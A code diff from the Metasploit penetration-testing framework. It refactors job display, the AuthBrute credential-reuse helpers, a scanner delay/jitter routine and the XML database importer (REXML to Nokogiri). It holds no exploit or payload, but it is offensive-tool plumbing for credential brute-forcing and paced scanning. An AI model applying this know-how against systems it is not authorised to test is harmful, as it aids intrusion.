|
@ -645,10 +647,10 @@ class ReadableText
|
|||
# @param col [Integer] the column wrap width.
|
||||
# @return [String] the formatted list of running jobs.
|
||||
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||
columns = [ 'Id', 'Name', "Payload", "LPORT" ]
|
||||
columns = [ 'Id', 'Name', "Payload", "Payload opts" ]
|
||||
|
||||
if (verbose)
|
||||
columns += [ "URIPATH", "Start Time" ]
|
||||
columns += [ "URIPATH", "Start Time", "Handler opts" ]
|
||||
end
|
||||
|
||||
tbl = Rex::Ui::Text::Table.new(
|
||||
|
@ -657,33 +659,41 @@ class ReadableText
|
|||
'Columns' => columns
|
||||
)
|
||||
|
||||
# jobs are stored as a hash with the keys being a numeric job_id.
|
||||
framework.jobs.keys.sort{|a,b| a.to_i <=> b.to_i }.each { |k|
|
||||
# jobs are stored as a hash with the keys being a numeric String job_id.
|
||||
framework.jobs.keys.sort_by(&:to_i).each do |job_id|
|
||||
# Job context is stored as an Array with the 0th element being
|
||||
# the running module. If that module is an exploit, ctx will also
|
||||
# contain its payload.
|
||||
ctx = framework.jobs[k].ctx
|
||||
row = [ k, framework.jobs[k].name ]
|
||||
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
|
||||
exploit_mod, _payload_mod = framework.jobs[job_id].ctx
|
||||
row = []
|
||||
row[0] = job_id
|
||||
row[1] = framework.jobs[job_id].name
|
||||
|
||||
# Make the LPORT show the bind port if it's different
|
||||
local_port = ctx[0].datastore['LPORT']
|
||||
bind_port = ctx[0].datastore['ReverseListenerBindPort']
|
||||
lport = (local_port || "").to_s
|
||||
if bind_port && bind_port != 0 && bind_port != lport
|
||||
lport << " (#{bind_port})"
|
||||
end
|
||||
row << lport
|
||||
pinst = exploit_mod.respond_to?(:payload_instance) ? exploit_mod.payload_instance : nil
|
||||
|
||||
if (verbose)
|
||||
uripath = ctx[0].get_resource if ctx[0].respond_to?(:get_resource)
|
||||
uripath = ctx[0].datastore['URIPATH'] if uripath.nil?
|
||||
row << (uripath || "")
|
||||
row << (framework.jobs[k].start_time || "")
|
||||
if pinst.nil?
|
||||
row[2] = ""
|
||||
row[3] = ""
|
||||
else
|
||||
row[2] = pinst.refname
|
||||
row[3] = ""
|
||||
if pinst.respond_to?(:payload_uri)
|
||||
row[3] << pinst.payload_uri
|
||||
end
|
||||
if pinst.respond_to?(:luri)
|
||||
row[3] << pinst.luri
|
||||
end
|
||||
end
|
||||
|
||||
if verbose
|
||||
uripath = exploit_mod.get_resource if exploit_mod.respond_to?(:get_resource)
|
||||
uripath ||= exploit_mod.datastore['URIPATH']
|
||||
row[4] = uripath
|
||||
row[5] = framework.jobs[job_id].start_time
|
||||
row[6] = pinst.respond_to?(:listener_uri) ? pinst.listener_uri : ""
|
||||
end
|
||||
tbl << row
|
||||
}
|
||||
end
|
||||
|
||||
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
|
||||
end
|
||||
|
|
|
@ -27,7 +27,7 @@ module Scriptable
|
|||
|
||||
# Scan all of the path combinations
|
||||
check_paths.each { |path|
|
||||
if ::File.exists?(path)
|
||||
if ::File.exist?(path)
|
||||
full_path = path
|
||||
break
|
||||
end
|
||||
|
|
|
@ -56,11 +56,11 @@ module Exploit
|
|||
# job.
|
||||
#
|
||||
def self.exploit_simple(oexploit, opts, &block)
|
||||
exploit = oexploit.replicant
|
||||
# Trap and print errors here (makes them UI-independent)
|
||||
begin
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
exploit = oexploit.replicant
|
||||
|
||||
Msf::Simple::Framework.simplify_module( exploit, false )
|
||||
yield(exploit) if block_given?
|
||||
|
||||
|
|
|
@ -30,7 +30,7 @@ module Framework
|
|||
def load(path, opts = {})
|
||||
def_path = Msf::Config.plugin_directory + File::SEPARATOR + path
|
||||
|
||||
if (File.exists?(def_path) or File.exists?(def_path + ".rb"))
|
||||
if (File.exist?(def_path) or File.exist?(def_path + ".rb"))
|
||||
super(def_path, opts)
|
||||
else
|
||||
super
|
||||
|
|
|
@ -49,7 +49,7 @@ module Auxiliary::AuthBrute
|
|||
@@max_per_service = nil
|
||||
end
|
||||
|
||||
# Yields each {Metasploit::Credential::Core} in the {Mdm::Workspace} with
|
||||
# Yields each Metasploit::Credential::Core in the Mdm::Workspace with
|
||||
# a private type of 'ntlm_hash'
|
||||
#
|
||||
# @yieldparam [Metasploit::Credential::Core]
|
||||
|
@ -60,7 +60,7 @@ module Auxiliary::AuthBrute
|
|||
end
|
||||
end
|
||||
|
||||
# Yields each {Metasploit::Credential::Core} in the {Mdm::Workspace} with
|
||||
# Yields each Metasploit::Credential::Core in the Mdm::Workspace with
|
||||
# a private type of 'password'
|
||||
#
|
||||
# @yieldparam [Metasploit::Credential::Core]
|
||||
|
@ -71,7 +71,7 @@ module Auxiliary::AuthBrute
|
|||
end
|
||||
end
|
||||
|
||||
# Yields each {Metasploit::Credential::Core} in the {Mdm::Workspace} with
|
||||
# Yields each Metasploit::Credential::Core in the Mdm::Workspace with
|
||||
# a private type of 'ssh_key'
|
||||
#
|
||||
# @yieldparam [Metasploit::Credential::Core]
|
||||
|
@ -90,7 +90,7 @@ module Auxiliary::AuthBrute
|
|||
(datastore['DB_ALL_CREDS'] || datastore['DB_ALL_PASS'] || datastore['DB_ALL_USERS']) && framework.db.active
|
||||
end
|
||||
|
||||
# This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing NTLMHashes
|
||||
# This method takes a Metasploit::Framework::CredentialCollection and prepends existing NTLMHashes
|
||||
# from the database. This allows the users to use the DB_ALL_CREDS option.
|
||||
#
|
||||
# @param cred_collection [Metasploit::Framework::CredentialCollection]
|
||||
|
@ -105,7 +105,7 @@ module Auxiliary::AuthBrute
|
|||
cred_collection
|
||||
end
|
||||
|
||||
# This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing SSHKeys
|
||||
# This method takes a Metasploit::Framework::CredentialCollection and prepends existing SSHKeys
|
||||
# from the database. This allows the users to use the DB_ALL_CREDS option.
|
||||
#
|
||||
# @param [Metasploit::Framework::CredentialCollection] cred_collection
|
||||
|
@ -120,7 +120,7 @@ module Auxiliary::AuthBrute
|
|||
cred_collection
|
||||
end
|
||||
|
||||
# This method takes a {Metasploit::Framework::CredentialCollection} and prepends existing Password Credentials
|
||||
# This method takes a Metasploit::Framework::CredentialCollection and prepends existing Password Credentials
|
||||
# from the database. This allows the users to use the DB_ALL_CREDS option.
|
||||
#
|
||||
# @param cred_collection [Metasploit::Framework::CredentialCollection]
|
||||
|
@ -135,9 +135,9 @@ module Auxiliary::AuthBrute
|
|||
cred_collection
|
||||
end
|
||||
|
||||
# Takes a {Metasploit::Credential::Core} and converts it into a
|
||||
# {Metasploit::Framework::Credential} and processes it into the
|
||||
# {Metasploit::Framework::CredentialCollection} as dictated by the
|
||||
# Takes a Metasploit::Credential::Core and converts it into a
|
||||
# Metasploit::Framework::Credential and processes it into the
|
||||
# Metasploit::Framework::CredentialCollection as dictated by the
|
||||
# selected datastore options.
|
||||
#
|
||||
# @param [Metasploit::Framework::CredentialCollection] cred_collection the credential collection to add to
|
||||
|
|
|
@ -27,8 +27,8 @@ module Msf
|
|||
def build_probe
|
||||
@probe ||= ::Net::DNS::Packet.new(query_name, query_type_num, query_class_num).data
|
||||
# TODO: support QU vs QM probes
|
||||
# @probe[@probe.size-2] = [0x80].pack('C')
|
||||
# @probe
|
||||
#+ @probe[@probe.size-2] = [0x80].pack('C')
|
||||
#+ @probe
|
||||
end
|
||||
|
||||
def query_class
|
||||
|
|
|
@ -70,7 +70,7 @@ module Auxiliary::Report
|
|||
# This method safely get the workspace ID. It handles if the db is not active
|
||||
#
|
||||
# @return [NilClass] if there is no DB connection
|
||||
# @return [Fixnum] the ID of the current {Mdm::Workspace}
|
||||
# @return [Fixnum] the ID of the current Mdm::Workspace
|
||||
def myworkspace_id
|
||||
if framework.db.active
|
||||
myworkspace.id
|
||||
|
@ -169,7 +169,7 @@ module Auxiliary::Report
|
|||
# should be used directly instead.
|
||||
#
|
||||
# @param opts [Hash] the option hash
|
||||
# @option opts [String] :host the address of the host (also takes a {Mdm::Host})
|
||||
# @option opts [String] :host the address of the host (also takes a Mdm::Host)
|
||||
# @option opts [Fixnum] :port the port of the connected service
|
||||
# @option opts [Mdm::Service] :service an optional Service object to build the cred for
|
||||
# @option opts [String] :type What type of private credential this is (e.g. "password", "hash", "ssh_key")
|
||||
|
|
|
@ -304,6 +304,36 @@ def scanner_show_progress
|
|||
end
|
||||
end
|
||||
|
||||
def add_delay_jitter(_delay, _jitter)
|
||||
# Introduce the delay
|
||||
delay_value = _delay.to_i
|
||||
original_value = delay_value
|
||||
jitter_value = _jitter.to_i
|
||||
|
||||
# Retrieve the jitter value and delay value
|
||||
# Delay = number of milliseconds to wait between each request
|
||||
# Jitter = percentage modifier. For example:
|
||||
# Delay is 1000ms (i.e. 1 second), Jitter is 50.
|
||||
# 50/100 = 0.5; 0.5*1000 = 500. Therefore, the per-request
|
||||
# delay will be 1000 +/- a maximum of 500ms.
|
||||
if delay_value > 0
|
||||
if jitter_value > 0
|
||||
rnd = Random.new
|
||||
if (rnd.rand(2) == 0)
|
||||
delay_value += rnd.rand(jitter_value)
|
||||
else
|
||||
delay_value -= rnd.rand(jitter_value)
|
||||
end
|
||||
if delay_value < 0
|
||||
delay_value = 0
|
||||
end
|
||||
end
|
||||
final_delay = delay_value.to_f / 1000.0
|
||||
vprint_status("Delaying for #{final_delay} second(s) (#{original_value}ms +/- #{jitter_value}ms)")
|
||||
sleep final_delay
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -30,7 +30,7 @@ class DataStore < Hash
|
|||
opt = @options[k]
|
||||
unless opt.nil?
|
||||
if opt.validate_on_assignment?
|
||||
unless opt.valid?(v)
|
||||
unless opt.valid?(v, check_empty: false)
|
||||
raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'"])
|
||||
end
|
||||
v = opt.normalize(v)
|
||||
|
|
|
@ -229,7 +229,7 @@ module Msf::DBManager::Import
|
|||
end
|
||||
|
||||
# This is a text string, lets make sure its treated as binary
|
||||
data = data.unpack("C*").pack("C*")
|
||||
data.force_encoding(Encoding::ASCII_8BIT)
|
||||
if data and data.to_s.strip.length == 0
|
||||
raise Msf::DBImportError.new("The data provided to the import function was empty")
|
||||
end
|
||||
|
|
|
@ -66,31 +66,31 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
|
||||
# Imports `Mdm::Note` objects from the XML element.
|
||||
#
|
||||
# @param note [REXML::Element] The Note element
|
||||
# @param note [Nokogiri::XML::Element] The Note element
|
||||
# @param allow_yaml [Boolean] whether to allow yaml
|
||||
# @param note_data [Hash] hash containing note attributes to be passed along
|
||||
# @return [void]
|
||||
def import_msf_note_element(note, allow_yaml, note_data={})
|
||||
note_data[:type] = nils_for_nulls(note.elements["ntype"].text.to_s.strip)
|
||||
note_data[:data] = nils_for_nulls(unserialize_object(note.elements["data"], allow_yaml))
|
||||
note_data[:type] = nils_for_nulls(note.at("ntype").text.to_s.strip)
|
||||
note_data[:data] = nils_for_nulls(unserialize_object(note.at("data"), allow_yaml))
|
||||
|
||||
if note.elements["critical"].text
|
||||
note_data[:critical] = true unless note.elements["critical"].text.to_s.strip == "NULL"
|
||||
if note.at("critical").text
|
||||
note_data[:critical] = true unless note.at("critical").text.to_s.strip == "NULL"
|
||||
end
|
||||
if note.elements["seen"].text
|
||||
note_data[:seen] = true unless note.elements["critical"].text.to_s.strip == "NULL"
|
||||
if note.at("seen").text
|
||||
note_data[:seen] = true unless note.at("critical").text.to_s.strip == "NULL"
|
||||
end
|
||||
%W{created-at updated-at}.each { |datum|
|
||||
if note.elements[datum].text
|
||||
note_data[datum.gsub("-","_")] = nils_for_nulls(note.elements[datum].text.to_s.strip)
|
||||
if note.at(datum).text
|
||||
note_data[datum.gsub("-","_")] = nils_for_nulls(note.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
report_note(note_data)
|
||||
end
|
||||
|
||||
# Imports web_form element using {Msf::DBManager#report_web_form}.
|
||||
# Imports web_form element using Msf::DBManager#report_web_form.
|
||||
#
|
||||
# @param element [REXML::Element] web_form element.
|
||||
# @param element [Nokogiri::XML::Element] web_form element.
|
||||
# @param options [Hash{Symbol => Object}] options
|
||||
# @option options [Boolean] :allow_yaml (false) Whether to allow YAML when
|
||||
# deserializing params.
|
||||
|
@ -115,7 +115,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# FIXME https://www.pivotaltracker.com/story/show/46578647
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
unserialized_params = unserialize_object(
|
||||
element.elements['params'],
|
||||
element.at('params'),
|
||||
options[:allow_yaml]
|
||||
)
|
||||
info[:params] = nils_for_nulls(unserialized_params)
|
||||
|
@ -124,9 +124,9 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
end
|
||||
end
|
||||
|
||||
# Imports web_page element using {Msf::DBManager#report_web_page}.
|
||||
# Imports web_page element using Msf::DBManager#report_web_page.
|
||||
#
|
||||
# @param element [REXML::Element] web_page element.
|
||||
# @param element [Nokogiri::XML::Element] web_page element.
|
||||
# @param options [Hash{Symbol => Object}] options
|
||||
# @option options [Boolean] :allow_yaml (false) Whether to allow YAML when
|
||||
# deserializing headers.
|
||||
|
@ -162,7 +162,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# FIXME https://www.pivotaltracker.com/story/show/46578647
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
unserialized_headers = unserialize_object(
|
||||
element.elements['headers'],
|
||||
element.at('headers'),
|
||||
options[:allow_yaml]
|
||||
)
|
||||
info[:headers] = nils_for_nulls(unserialized_headers)
|
||||
|
@ -171,9 +171,9 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
end
|
||||
end
|
||||
|
||||
# Imports web_vuln element using {Msf::DBManager#report_web_vuln}.
|
||||
# Imports web_vuln element using Msf::DBManager#report_web_vuln.
|
||||
#
|
||||
# @param element [REXML::Element] web_vuln element.
|
||||
# @param element [Nokogiri::XML::Element] web_vuln element.
|
||||
# @param options [Hash{Symbol => Object}] options
|
||||
# @option options [Boolean] :allow_yaml (false) Whether to allow YAML when
|
||||
# deserializing headers.
|
||||
|
@ -209,7 +209,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# FIXME https://www.pivotaltracker.com/story/show/46578647
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
unserialized_params = unserialize_object(
|
||||
element.elements['params'],
|
||||
element.at('params'),
|
||||
options[:allow_yaml]
|
||||
)
|
||||
info[:params] = nils_for_nulls(unserialized_params)
|
||||
|
@ -232,314 +232,325 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
wspace = args[:wspace] || workspace
|
||||
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
|
||||
|
||||
doc = rexmlify(data)
|
||||
metadata = check_msf_xml_version!(doc)
|
||||
doc = Nokogiri::XML::Reader.from_memory(data)
|
||||
metadata = check_msf_xml_version!(doc.first.name)
|
||||
allow_yaml = metadata[:allow_yaml]
|
||||
btag = metadata[:root_tag]
|
||||
|
||||
doc.elements.each("/#{btag}/hosts/host") do |host|
|
||||
host_data = {}
|
||||
host_data[:task] = args[:task]
|
||||
host_data[:workspace] = wspace
|
||||
|
||||
# A regression resulted in the address field being serialized in some cases.
|
||||
# Lets handle both instances to keep things happy. See #5837 & #5985
|
||||
addr = nils_for_nulls(host.elements["address"])
|
||||
next unless addr
|
||||
|
||||
# No period or colon means this must be in base64-encoded serialized form
|
||||
if addr !~ /[\.\:]/
|
||||
addr = unserialize_object(addr)
|
||||
end
|
||||
|
||||
host_data[:host] = addr
|
||||
if bl.include? host_data[:host]
|
||||
next
|
||||
else
|
||||
yield(:address,host_data[:host]) if block
|
||||
end
|
||||
host_data[:mac] = nils_for_nulls(host.elements["mac"].text.to_s.strip)
|
||||
if host.elements["comm"].text
|
||||
host_data[:comm] = nils_for_nulls(host.elements["comm"].text.to_s.strip)
|
||||
end
|
||||
%W{created-at updated-at name state os-flavor os-lang os-name os-sp purpose}.each { |datum|
|
||||
if host.elements[datum].text
|
||||
host_data[datum.gsub('-','_')] = nils_for_nulls(host.elements[datum].text.to_s.strip)
|
||||
doc.each do |node|
|
||||
unless node.inner_xml.empty?
|
||||
case node.name
|
||||
when 'host'
|
||||
parse_host(Nokogiri::XML(node.outer_xml).at("./#{node.name}"), wspace, bl, allow_yaml, btag, args, &block)
|
||||
when 'web_site'
|
||||
parse_web_site(Nokogiri::XML(node.outer_xml).at("./#{node.name}"), wspace, bl, allow_yaml, btag, args, &block)
|
||||
when 'web_page', 'web_form', 'web_vuln'
|
||||
send(
|
||||
"import_msf_#{node.name}_element",
|
||||
Nokogiri::XML(node.outer_xml).at("./#{node.name}"),
|
||||
:allow_yaml => allow_yaml,
|
||||
:workspace => wspace,
|
||||
&block
|
||||
)
|
||||
end
|
||||
}
|
||||
host_address = host_data[:host].dup # Preserve after report_host() deletes
|
||||
hobj = report_host(host_data)
|
||||
|
||||
host.elements.each("host_details/host_detail") do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
next if ["id", "host-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_host_details(hobj, hdet_data)
|
||||
end
|
||||
|
||||
host.elements.each("exploit_attempts/exploit_attempt") do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
next if ["id", "host-id", "session-id", "vuln-id", "service-id", "loot-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_exploit_attempt(hobj, hdet_data)
|
||||
end
|
||||
|
||||
host.elements.each('services/service') do |service|
|
||||
service_data = {}
|
||||
service_data[:task] = args[:task]
|
||||
service_data[:workspace] = wspace
|
||||
service_data[:host] = hobj
|
||||
service_data[:port] = nils_for_nulls(service.elements["port"].text.to_s.strip).to_i
|
||||
service_data[:proto] = nils_for_nulls(service.elements["proto"].text.to_s.strip)
|
||||
%W{created-at updated-at name state info}.each { |datum|
|
||||
if service.elements[datum].text
|
||||
if datum == "info"
|
||||
service_data["info"] = nils_for_nulls(unserialize_object(service.elements[datum], false))
|
||||
else
|
||||
service_data[datum.gsub("-","_")] = nils_for_nulls(service.elements[datum].text.to_s.strip)
|
||||
end
|
||||
end
|
||||
}
|
||||
report_service(service_data)
|
||||
end
|
||||
|
||||
host.elements.each('notes/note') do |note|
|
||||
note_data = {}
|
||||
note_data[:workspace] = wspace
|
||||
note_data[:host] = hobj
|
||||
import_msf_note_element(note,allow_yaml,note_data)
|
||||
end
|
||||
|
||||
host.elements.each('tags/tag') do |tag|
|
||||
tag_data = {}
|
||||
tag_data[:addr] = host_address
|
||||
tag_data[:wspace] = wspace
|
||||
tag_data[:name] = tag.elements["name"].text.to_s.strip
|
||||
tag_data[:desc] = tag.elements["desc"].text.to_s.strip
|
||||
if tag.elements["report-summary"].text
|
||||
tag_data[:summary] = tag.elements["report-summary"].text.to_s.strip
|
||||
end
|
||||
if tag.elements["report-detail"].text
|
||||
tag_data[:detail] = tag.elements["report-detail"].text.to_s.strip
|
||||
end
|
||||
if tag.elements["critical"].text
|
||||
tag_data[:crit] = true unless tag.elements["critical"].text.to_s.strip == "NULL"
|
||||
end
|
||||
report_host_tag(tag_data)
|
||||
end
|
||||
|
||||
host.elements.each('vulns/vuln') do |vuln|
|
||||
vuln_data = {}
|
||||
vuln_data[:workspace] = wspace
|
||||
vuln_data[:host] = hobj
|
||||
vuln_data[:info] = nils_for_nulls(unserialize_object(vuln.elements["info"], allow_yaml))
|
||||
vuln_data[:name] = nils_for_nulls(vuln.elements["name"].text.to_s.strip)
|
||||
%W{created-at updated-at exploited-at}.each { |datum|
|
||||
if vuln.elements[datum] and vuln.elements[datum].text
|
||||
vuln_data[datum.gsub("-","_")] = nils_for_nulls(vuln.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
if vuln.elements["refs"]
|
||||
vuln_data[:refs] = []
|
||||
vuln.elements.each("refs/ref") do |ref|
|
||||
vuln_data[:refs] << nils_for_nulls(ref.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
|
||||
vobj = report_vuln(vuln_data)
|
||||
|
||||
vuln.elements.each("notes/note") do |note|
|
||||
note_data = {}
|
||||
note_data[:workspace] = wspace
|
||||
note_data[:vuln_id] = vobj.id
|
||||
import_msf_note_element(note,allow_yaml,note_data)
|
||||
end
|
||||
|
||||
vuln.elements.each("vuln_details/vuln_detail") do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
next if ["id", "vuln-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_vuln_details(vobj, vdet_data)
|
||||
end
|
||||
|
||||
vuln.elements.each("vuln_attempts/vuln_attempt") do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
next if ["id", "vuln-id", "loot-id", "session-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_vuln_attempt(vobj, vdet_data)
|
||||
end
|
||||
end
|
||||
|
||||
## Handle old-style (pre 4.10) XML files
|
||||
if btag == "MetasploitV4"
|
||||
if host.elements['creds'].present?
|
||||
unless host.elements['creds'].elements.empty?
|
||||
origin = Metasploit::Credential::Origin::Import.create(filename: "console-import-#{Time.now.to_i}")
|
||||
|
||||
host.elements.each('creds/cred') do |cred|
|
||||
username = cred.elements['user'].try(:text)
|
||||
proto = cred.elements['proto'].try(:text)
|
||||
sname = cred.elements['sname'].try(:text)
|
||||
port = cred.elements['port'].try(:text)
|
||||
|
||||
# Handle blanks by resetting to sane default values
|
||||
proto = "tcp" if proto.blank?
|
||||
pass = cred.elements['pass'].try(:text)
|
||||
pass = "" if pass == "*MASKED*"
|
||||
|
||||
private = create_credential_private(private_data: pass, private_type: :password)
|
||||
public = create_credential_public(username: username)
|
||||
core = create_credential_core(private: private, public: public, origin: origin, workspace_id: wspace.id)
|
||||
|
||||
create_credential_login(core: core,
|
||||
workspace_id: wspace.id,
|
||||
address: hobj.address,
|
||||
port: port,
|
||||
protocol: proto,
|
||||
service_name: sname,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
host.elements.each('sessions/session') do |sess|
|
||||
sess_id = nils_for_nulls(sess.elements["id"].text.to_s.strip.to_i)
|
||||
sess_data = {}
|
||||
sess_data[:host] = hobj
|
||||
%W{desc platform port stype}.each {|datum|
|
||||
if sess.elements[datum].respond_to? :text
|
||||
sess_data[datum.intern] = nils_for_nulls(sess.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
%W{opened-at close-reason closed-at via-exploit via-payload}.each {|datum|
|
||||
if sess.elements[datum].respond_to? :text
|
||||
sess_data[datum.gsub("-","_").intern] = nils_for_nulls(sess.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
sess_data[:datastore] = nils_for_nulls(unserialize_object(sess.elements["datastore"], allow_yaml))
|
||||
if sess.elements["routes"]
|
||||
sess_data[:routes] = nils_for_nulls(unserialize_object(sess.elements["routes"], allow_yaml)) || []
|
||||
end
|
||||
if not sess_data[:closed_at] # Fake a close if we don't already have one
|
||||
sess_data[:closed_at] = Time.now.utc
|
||||
sess_data[:close_reason] = "Imported at #{Time.now.utc}"
|
||||
end
|
||||
|
||||
existing_session = get_session(
|
||||
:workspace => sess_data[:host].workspace,
|
||||
:addr => sess_data[:host].address,
|
||||
:time => sess_data[:opened_at]
|
||||
)
|
||||
this_session = existing_session || report_session(sess_data)
|
||||
next if existing_session
|
||||
sess.elements.each('events/event') do |sess_event|
|
||||
sess_event_data = {}
|
||||
sess_event_data[:session] = this_session
|
||||
%W{created-at etype local-path remote-path}.each {|datum|
|
||||
if sess_event.elements[datum].respond_to? :text
|
||||
sess_event_data[datum.gsub("-","_").intern] = nils_for_nulls(sess_event.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
%W{command output}.each {|datum|
|
||||
if sess_event.elements[datum].respond_to? :text
|
||||
sess_event_data[datum.gsub("-","_").intern] = nils_for_nulls(unserialize_object(sess_event.elements[datum], allow_yaml))
|
||||
end
|
||||
}
|
||||
report_session_event(sess_event_data)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
# Import web sites
|
||||
doc.elements.each("/#{btag}/web_sites/web_site") do |web|
|
||||
info = {}
|
||||
info[:workspace] = wspace
|
||||
|
||||
%W{host port vhost ssl comments}.each do |datum|
|
||||
if web.elements[datum].respond_to? :text
|
||||
info[datum.intern] = nils_for_nulls(web.elements[datum].text.to_s.strip)
|
||||
end
|
||||
end
|
||||
|
||||
info[:options] = nils_for_nulls(unserialize_object(web.elements["options"], allow_yaml)) if web.elements["options"].respond_to?(:text)
|
||||
info[:ssl] = (info[:ssl] and info[:ssl].to_s.strip.downcase == "true") ? true : false
|
||||
|
||||
%W{created-at updated-at}.each { |datum|
|
||||
if web.elements[datum].text
|
||||
info[datum.gsub("-","_")] = nils_for_nulls(web.elements[datum].text.to_s.strip)
|
||||
end
|
||||
}
|
||||
|
||||
report_web_site(info)
|
||||
yield(:web_site, "#{info[:host]}:#{info[:port]} (#{info[:vhost]})") if block
|
||||
end
|
||||
|
||||
%W{page form vuln}.each do |wtype|
|
||||
doc.elements.each("/#{btag}/web_#{wtype}s/web_#{wtype}") do |element|
|
||||
send(
|
||||
"import_msf_web_#{wtype}_element",
|
||||
element,
|
||||
:allow_yaml => allow_yaml,
|
||||
:workspace => wspace,
|
||||
&block
|
||||
)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
# Parses website Nokogiri::XML::Element
|
||||
def parse_web_site(web, wspace, bl, allow_yaml, btag, args, &block)
|
||||
# Import web sites
|
||||
info = {}
|
||||
info[:workspace] = wspace
|
||||
|
||||
%W{host port vhost ssl comments}.each do |datum|
|
||||
if web.at(datum).respond_to? :text
|
||||
info[datum.intern] = nils_for_nulls(web.at(datum).text.to_s.strip)
|
||||
end
|
||||
end
|
||||
|
||||
info[:options] = nils_for_nulls(unserialize_object(web.at("options"), allow_yaml)) if web.at("options").respond_to?(:text)
|
||||
info[:ssl] = (info[:ssl] and info[:ssl].to_s.strip.downcase == "true") ? true : false
|
||||
|
||||
%W{created-at updated-at}.each { |datum|
|
||||
if web.at(datum).text
|
||||
info[datum.gsub("-","_")] = nils_for_nulls(web.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
|
||||
report_web_site(info)
|
||||
yield(:web_site, "#{info[:host]}:#{info[:port]} (#{info[:vhost]})") if block
|
||||
end
|
||||
|
||||
# Parses host Nokogiri::XML::Element
|
||||
def parse_host(host, wspace, bl, allow_yaml, btag, args, &block)
|
||||
|
||||
host_data = {}
|
||||
host_data[:task] = args[:task]
|
||||
host_data[:workspace] = wspace
|
||||
|
||||
# A regression resulted in the address field being serialized in some cases.
|
||||
# Lets handle both instances to keep things happy. See #5837 & #5985
|
||||
addr = nils_for_nulls(host.at('address'))
|
||||
return 0 unless addr
|
||||
|
||||
# No period or colon means this must be in base64-encoded serialized form
|
||||
if addr !~ /[\.\:]/
|
||||
addr = unserialize_object(addr)
|
||||
end
|
||||
|
||||
host_data[:host] = addr
|
||||
if bl.include? host_data[:host]
|
||||
return 0
|
||||
else
|
||||
yield(:address,host_data[:host]) if block
|
||||
end
|
||||
host_data[:mac] = nils_for_nulls(host.at("mac").text.to_s.strip)
|
||||
if host.at("comm").text
|
||||
host_data[:comm] = nils_for_nulls(host.at("comm").text.to_s.strip)
|
||||
end
|
||||
%W{created-at updated-at name state os-flavor os-lang os-name os-sp purpose}.each { |datum|
|
||||
if host.at(datum).text
|
||||
host_data[datum.gsub('-','_')] = nils_for_nulls(host.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
host_address = host_data[:host].dup # Preserve after report_host() deletes
|
||||
hobj = report_host(host_data)
|
||||
|
||||
host.xpath("host_details/host_detail").each do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
return 0 if ["id", "host-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_host_details(hobj, hdet_data)
|
||||
end
|
||||
|
||||
host.xpath("exploit_attempts/exploit_attempt").each do |hdet|
|
||||
hdet_data = {}
|
||||
hdet.elements.each do |det|
|
||||
return 0 if ["id", "host-id", "session-id", "vuln-id", "service-id", "loot-id"].include?(det.name)
|
||||
if det.text
|
||||
hdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_exploit_attempt(hobj, hdet_data)
|
||||
end
|
||||
|
||||
host.xpath('services/service').each do |service|
|
||||
service_data = {}
|
||||
service_data[:task] = args[:task]
|
||||
service_data[:workspace] = wspace
|
||||
service_data[:host] = hobj
|
||||
service_data[:port] = nils_for_nulls(service.at("port").text.to_s.strip).to_i
|
||||
